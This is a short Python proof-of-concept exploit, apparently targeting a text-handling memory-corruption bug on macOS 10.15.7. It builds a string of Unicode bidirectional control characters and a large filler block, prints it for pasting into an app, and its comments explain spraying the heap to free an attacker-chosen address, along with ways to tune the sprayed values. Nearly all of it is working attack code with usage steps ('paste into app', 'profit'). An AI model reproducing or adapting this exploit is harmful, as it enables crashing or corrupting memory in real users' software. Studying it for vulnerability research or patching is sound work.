# python3 poc.py | pbcopy
# paste into app
# profit
#
# super stable PoC
# works about 10% of the time if you're lucky
#
# should free 0x1515151515151515
# it like sprays that in a similar location to the free list, and sometimes ends up freeing it
# for a more controlled free you might have to find each of the 256 values (i haven't yet), and substitute them
# example: 0x41 becomes 0x15, and 0xffff becomes 0x4
# so if you spray "\x41\x41\uffff\x41\uffff\uffff\uffff\uffff" it'll spray 0x1515041504040404, maybe something else because endianness but fuck you, whatever
# also there's like an offset of 0x2 or something
# i add "\uffff\uffff" at the start which seems to pad it for the address to work right
# it's vaguely functional, and should at least prove the bug exists
# note: this may have been patched in some big sur version (or 11.0 itself)
# run on 10.15.7, it's been tested there.

import sys

def lol(l2):
	"""Build the PoC string made of *l2* segments and return it.

	The character pool is built from every ordered pair of the six bidi
	control code points U+202A..U+202F.  Because the original extends the
	list with the two-character string (not appends it), the pool is a flat
	list of 72 single code points, not 36 pairs; that quirk is preserved here.

	Segment ``idx`` is ``pool[idx % 72]`` followed by ``"\\x01"``, except the
	segment at index 6, which is followed by 0x8000 ``"A"`` characters.
	"""
	controls = ["\u202a", "\u202b", "\u202c", "\u202d", "\u202e", "\u202f"]
	# Flattened: each pair contributes its two code points separately.
	pool = [ch for first in controls for second in controls for ch in first + second]
	pool_size = len(pool)
	# Loop-invariant; the original rebuilt it on every iteration.
	filler = "\x41" * 0x8000
	segments = []
	for idx in range(l2):
		segments.append(pool[idx % pool_size])
		segments.append(filler if idx == 6 else "\1")
	return "".join(segments)

print(lol(18))